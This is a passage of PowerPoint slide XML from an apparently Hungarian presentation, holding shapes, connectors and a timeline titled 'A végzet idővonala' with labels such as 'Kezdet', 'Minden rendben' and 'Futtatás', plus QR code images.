              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="100000">
                    <a:srgbClr val="C00000"/>
                  </a:gs>
                  <a:gs pos="57000">
                    <a:srgbClr val="FFB521"/>
                  </a:gs>
                  <a:gs pos="20000">
                    <a:srgbClr val="EA6D09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64" name="Straight Arrow Connector 163">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFE49675-2D21-58B2-F06A-D073533A4E76}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="165" idx="0"/>
                <a:endCxn id="163" idx="4"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="1538896" y="4424878"/>
                <a:ext cx="1695451" cy="904098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275B2F7A-0513-5AF5-84E5-2BAFD17BB440}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="62122" y="5328976"/>
                <a:ext cx="2953547" cy="477054"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom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hu-HU" sz="2500" dirty="0" smtClean="0">
                    <a:gradFill>
                      <a:gsLst>
                        <a:gs pos="100000">
                          <a:srgbClr val="C00000"/>
                        </a:gs>
                        <a:gs pos="57000">
                          <a:srgbClr val="FFB521"/>
                        </a:gs>
                        <a:gs pos="20000">
                          <a:srgbClr val="EA6D09"/>
                        </a:gs>
                      </a:gsLst>
                      <a:path path="circle">
                        <a:fillToRect l="100000" t="100000"/>
                      </a:path>
                    </a:gradFill>
                  </a:rPr>
                  <a:t>Futtatás</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="2500" dirty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endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="161" name="Flowchart: Connector 160">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{394FCD3D-B0B9-D5D7-7E9D-FE15C142E5D4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4751004" y="6365258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62" name="Straight Arrow Connector 161">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{920DB956-5B80-CF8D-5827-A4EC82242F90}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="165" idx="0"/>
              <a:endCxn id="161" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="4870123" y="6603495"/>
              <a:ext cx="571499" cy="896720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0A6F75C4-528F-151B-69AA-7D37851063FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219753" y="6357880"/>
            <a:ext cx="238237" cy="238237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2F78A7F4-91BA-BF05-46D0-A374B76239D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1111441" y="3597681"/>
            <a:ext cx="16527688" cy="4718713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6DFF6B0D-0406-1002-9CB8-CB942DEA4948}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4296702" y="6120245"/>
            <a:ext cx="4067980" cy="3013364"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="161925">
            <a:solidFill>
              <a:srgbClr val="0096A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6268CE49-8B19-FEDB-4274-8A064E1F3CD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4454097" y="6351793"/>
            <a:ext cx="3827890" cy="2301990"/>
            <a:chOff x="4454097" y="6351793"/>
            <a:chExt cx="3827890" cy="2301990"/>
          </a:xfrm>
        </p:grpSpPr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4B346220-8CE5-F4B0-402F-C1DCCC76A28A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5425916" y="6357880"/>
              <a:ext cx="2856071" cy="2295903"/>
              <a:chOff x="-1166808" y="4186641"/>
              <a:chExt cx="2856071" cy="2295903"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="156" name="Flowchart: Connector 155">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2528C943-982F-923F-2FFC-C768711B5C39}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="48178" y="4186641"/>
                <a:ext cx="238237" cy="238237"/>
              </a:xfrm>
              <a:prstGeom prst="flowChartConnector">
                <a:avLst/>
              </a:prstGeom>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="100000">
                    <a:srgbClr val="C00000"/>
                  </a:gs>
                  <a:gs pos="57000">
                    <a:srgbClr val="FFB521"/>
                  </a:gs>
                  <a:gs pos="20000">
                    <a:srgbClr val="EA6D09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57" name="Straight Arrow Connector 156">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E34A67AC-D909-6038-1C89-DF92A4FE7D08}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="158" idx="0"/>
                <a:endCxn id="156" idx="4"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1" flipV="1">
                <a:off x="167297" y="4424878"/>
                <a:ext cx="93931" cy="1195892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48504BEE-D54A-FE45-5597-6BBDDB64D257}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="-1166808" y="5620770"/>
                <a:ext cx="2856071" cy="861774"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom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hu-HU" sz="2500" dirty="0" smtClean="0">
                    <a:gradFill>
                      <a:gsLst>
                        <a:gs pos="100000">
                          <a:srgbClr val="C00000"/>
                        </a:gs>
                        <a:gs pos="57000">
                          <a:srgbClr val="FFB521"/>
                        </a:gs>
                        <a:gs pos="20000">
                          <a:srgbClr val="EA6D09"/>
                        </a:gs>
                      </a:gsLst>
                      <a:path path="circle">
                        <a:fillToRect l="100000" t="100000"/>
                      </a:path>
                    </a:gradFill>
                  </a:rPr>
                  <a:t>Használni kívánt eszközök beszerzés</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="2500" dirty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endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="154" name="Flowchart: Connector 153">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FAD5BF6-F283-5D8E-4D71-D587AE8BD211}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4454097" y="6351793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5" name="Straight Arrow Connector 154">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9D1F9C5-8203-645E-3D4D-60C5DA677DAA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="158" idx="0"/>
              <a:endCxn id="154" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="4573216" y="6590030"/>
              <a:ext cx="2280736" cy="1201979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92260" y="0"/>
            <a:ext cx="189574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4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4D0AC-FC4F-AAED-4763-E818F2CE0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5BD72-53F4-EA4F-E9CC-491FD092ED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Final Lesson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535820-5693-A2F0-941A-20E99C3EC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190" y="572071"/>
            <a:ext cx="9047619" cy="9142857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2260" y="0"/>
            <a:ext cx="189574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81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3B57DF26-7ED8-28FD-FFAF-A1B0F51F209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1284444" y="6949278"/>
            <a:ext cx="16100931" cy="12558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E83E8D4-4FFF-1D7B-3CDC-761D7993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300" y="318451"/>
            <a:ext cx="16535400" cy="1431256"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>A végzet idővonala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6E13488-F64B-8A05-90DB-56AF51AE8FEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1338870" y="6476999"/>
            <a:ext cx="16072830" cy="266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59D81AB7-588A-7306-8418-54D583B6CC1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17292582" y="6357881"/>
            <a:ext cx="238237" cy="238237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41BE5FB-BF54-D1B4-1EA8-BFA51B1AF894}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2711248" y="4681823"/>
            <a:ext cx="2506523" cy="1914294"/>
            <a:chOff x="85608" y="3348323"/>
            <a:chExt cx="2506523" cy="1914294"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Flowchart: Connector 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{254E1F9B-86C6-17FF-F457-214AE436363A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219753" y="5024380"/>
              <a:ext cx="238237" cy="238237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FA99D14E-5119-59FA-D647-D171DB67E7B8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="36" idx="2"/>
              <a:endCxn id="34" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1338870" y="3825377"/>
              <a:ext cx="2" cy="1199003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6EF5EB7-9D0B-6D24-48BD-1763C8E768B9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="85608" y="3348323"/>
              <a:ext cx="2506523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solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Minden rendben</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="25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5F3CE51-F744-B9A4-4A3B-4BB7C48869A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5336888" y="5381071"/>
            <a:ext cx="2506523" cy="1215046"/>
            <a:chOff x="85608" y="4047571"/>
            <a:chExt cx="2506523" cy="1215046"/>
          </a:xfrm>
        </p:grpSpPr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E85A963A-72B5-DDF0-2CF4-01045612A9EA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219753" y="5024380"/>
              <a:ext cx="238237" cy="238237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F873C5C-450C-BBD7-7C1F-EC5BDB1620ED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="40" idx="2"/>
              <a:endCxn id="38" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1338870" y="4524625"/>
              <a:ext cx="2" cy="499755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F26DF7D-BF7D-4DE3-2AB9-A881453C3FA1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="85608" y="4047571"/>
              <a:ext cx="2506523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solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Minden rendben</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="25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A97DA7F-9153-9EC9-14FB-1DDF1A99E813}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7962529" y="4681823"/>
            <a:ext cx="2506523" cy="1914294"/>
            <a:chOff x="85609" y="3348323"/>
            <a:chExt cx="2506523" cy="1914294"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Flowchart: Connector 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58F2E21F-AA96-16AE-4980-6BA152FAD514}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219753" y="5024380"/>
              <a:ext cx="238237" cy="238237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98FABF93-6695-E995-7166-0D582C6D0A96}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="44" idx="2"/>
              <a:endCxn id="42" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1338871" y="3825377"/>
              <a:ext cx="1" cy="1199003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EFCA5A1-4793-73AB-76A7-28C625050B49}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="85609" y="3348323"/>
              <a:ext cx="2506523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solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Minden rendben</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="25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2536835-33B9-6527-36CA-542894EC967E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10588169" y="5381071"/>
            <a:ext cx="2506523" cy="1215046"/>
            <a:chOff x="85608" y="4047571"/>
            <a:chExt cx="2506523" cy="1215046"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="Flowchart: Connector 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{715C925B-5591-4A11-D2CB-AA2C895B2BDA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219753" y="5024380"/>
              <a:ext cx="238237" cy="238237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5A8BCB36-2C2F-8A08-0F78-280B5E872852}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="49" idx="2"/>
              <a:endCxn id="47" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1338870" y="4524625"/>
              <a:ext cx="2" cy="499755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B4AB87A-3D7D-2342-FE9C-34A7F499FA54}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="85608" y="4047571"/>
              <a:ext cx="2506523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solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Minden rendben</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="25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141C44F-BD6A-F3C2-648D-01374C2E5E00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="85610" y="6596117"/>
            <a:ext cx="2506523" cy="338554"/>
            <a:chOff x="190403" y="4233930"/>
            <a:chExt cx="2506523" cy="338554"/>
          </a:xfrm>
        </p:grpSpPr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E86F74DA-07F3-A72C-AB83-8A2035EF6BA7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="70" idx="0"/>
              <a:endCxn id="5" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1443665" y="4233930"/>
              <a:ext cx="0" cy="50800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F02BD52-D585-D127-45C9-711FBC54E6B6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="190403" y="4233930"/>
              <a:ext cx="2506523" cy="3385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1600" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Kezdet</a:t>
              </a:r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94" name="Picture 93">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E838533-4AAC-4489-EC32-FA2208BF8D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749" y="1749707"/>
            <a:ext cx="2730501" cy="2730501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="107" name="Group 106">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4FED64D-927E-C9E3-708A-EDB92FC29D2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11180607" y="3996076"/>
            <a:ext cx="6572923" cy="2600041"/>
            <a:chOff x="11180607" y="3996076"/>
            <a:chExt cx="6572923" cy="2600041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8D3DE281-AA22-2D16-106E-764F06484DEE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="11180607" y="3996076"/>
              <a:ext cx="6572923" cy="2600041"/>
              <a:chOff x="-1947594" y="2662576"/>
              <a:chExt cx="6572923" cy="2600041"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51" name="Flowchart: Connector 50">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B2AB875-3FE5-90E3-938E-19A92F79382E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1219753" y="5024380"/>
                <a:ext cx="238237" cy="238237"/>
              </a:xfrm>
              <a:prstGeom prst="flowChartConnector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11BDA3B5-6159-E8EE-D2C2-D83112003D99}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="53" idx="2"/>
                <a:endCxn id="51" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1338868" y="4047571"/>
                <a:ext cx="4" cy="976809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CCD7EE8B-7AD8-EF32-4332-0A324EFC50FD}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="-1947594" y="2662576"/>
                <a:ext cx="6572923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bg1"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-lt"/>
                  </a:rPr>
                  <a:t/>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="2800" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-lt"/>
                  </a:rPr>
                </a:br>
                <a:endParaRPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:endParaRPr lang="en-US" sz="28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pic>
          <p:nvPicPr>
            <p:cNvPr id="106" name="Picture 105" descr="A letter f in orange letters&#10;&#10;AI-generated content may be incorrect.">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{984E81AB-BC5B-2562-4EF1-B6A6CBB4D4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64226" y="4114323"/>
              <a:ext cx="6405683" cy="1170694"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grp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9BD9B8EB-C0CE-1DC9-9E1B-FD915CEA8603}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215653" y="6357880"/>
            <a:ext cx="238237" cy="238237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535C376-835B-CF97-E6EE-23B67D7691F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="85608" y="5381071"/>
            <a:ext cx="2506523" cy="1215046"/>
            <a:chOff x="85608" y="4047571"/>
            <a:chExt cx="2506523" cy="1215046"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Flowchart: Connector 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8212ED39-F9E9-CD1B-192B-2C095997C9DD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219753" y="5024380"/>
              <a:ext cx="238237" cy="238237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5EAB993-48C1-8A30-E9F1-A83111703A88}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="9" idx="2"/>
              <a:endCxn id="5" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1338870" y="4524625"/>
              <a:ext cx="2" cy="499755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974B39C-62D0-57AE-59E2-899EEAC4DB80}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="85608" y="4047571"/>
              <a:ext cx="2506523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solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Minden rendben</a:t>
              </a:r>
              <a:endParaRPr lang="hu-HU" sz="2500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8" name="Kép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59080" y="0"/>
            <a:ext cx="1928920" cy="50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13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593D2-B791-B806-0D6B-1BDF84341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2260" y="0"/>
            <a:ext cx="1895740" cy="543001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36" y="749931"/>
            <a:ext cx="15089822" cy="360000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3025" y="4781005"/>
            <a:ext cx="8943454" cy="494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88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420" y="2416628"/>
            <a:ext cx="7200000" cy="7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810133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F3487-E34F-8556-3C46-7E9D1374E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FDC94CD-AF60-1993-6EDD-4E2FF8297F38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6848610" y="2169574"/>
            <a:ext cx="10800000" cy="5760000"/>
            <a:chOff x="5027300" y="1190658"/>
            <a:chExt cx="12905656" cy="604639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753484F-D913-7477-F3F5-6D95F32AD7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452" t="-818" r="-1456" b="41247"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="12081802" y="1190658"/>
              <a:ext cx="4979284" cy="4977210"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 3554"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:effectLst>
              <a:outerShdw blurRad="5080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Picture 5" descr="Qr code&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86B3B198-0106-93EA-9363-A22D69330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81128" y="4485221"/>
              <a:ext cx="2751828" cy="2751828"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 7513"/>
              </a:avLst>
            </a:prstGeom>
            <a:effectLst>
              <a:outerShdw blurRad="5080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C139165-50CF-06E4-F5A6-6383B12547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1535" t="-1729" r="-1535" b="-1985"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6074733" y="1190658"/>
              <a:ext cx="4960450" cy="4977211"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 3522"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:effectLst>
              <a:outerShdw blurRad="5080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7" descr="Qr code&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0903F5F3-112B-5EFC-5F02-D50EFAFAD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7300" y="4485221"/>
              <a:ext cx="2751828" cy="2751828"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 7513"/>
              </a:avLst>
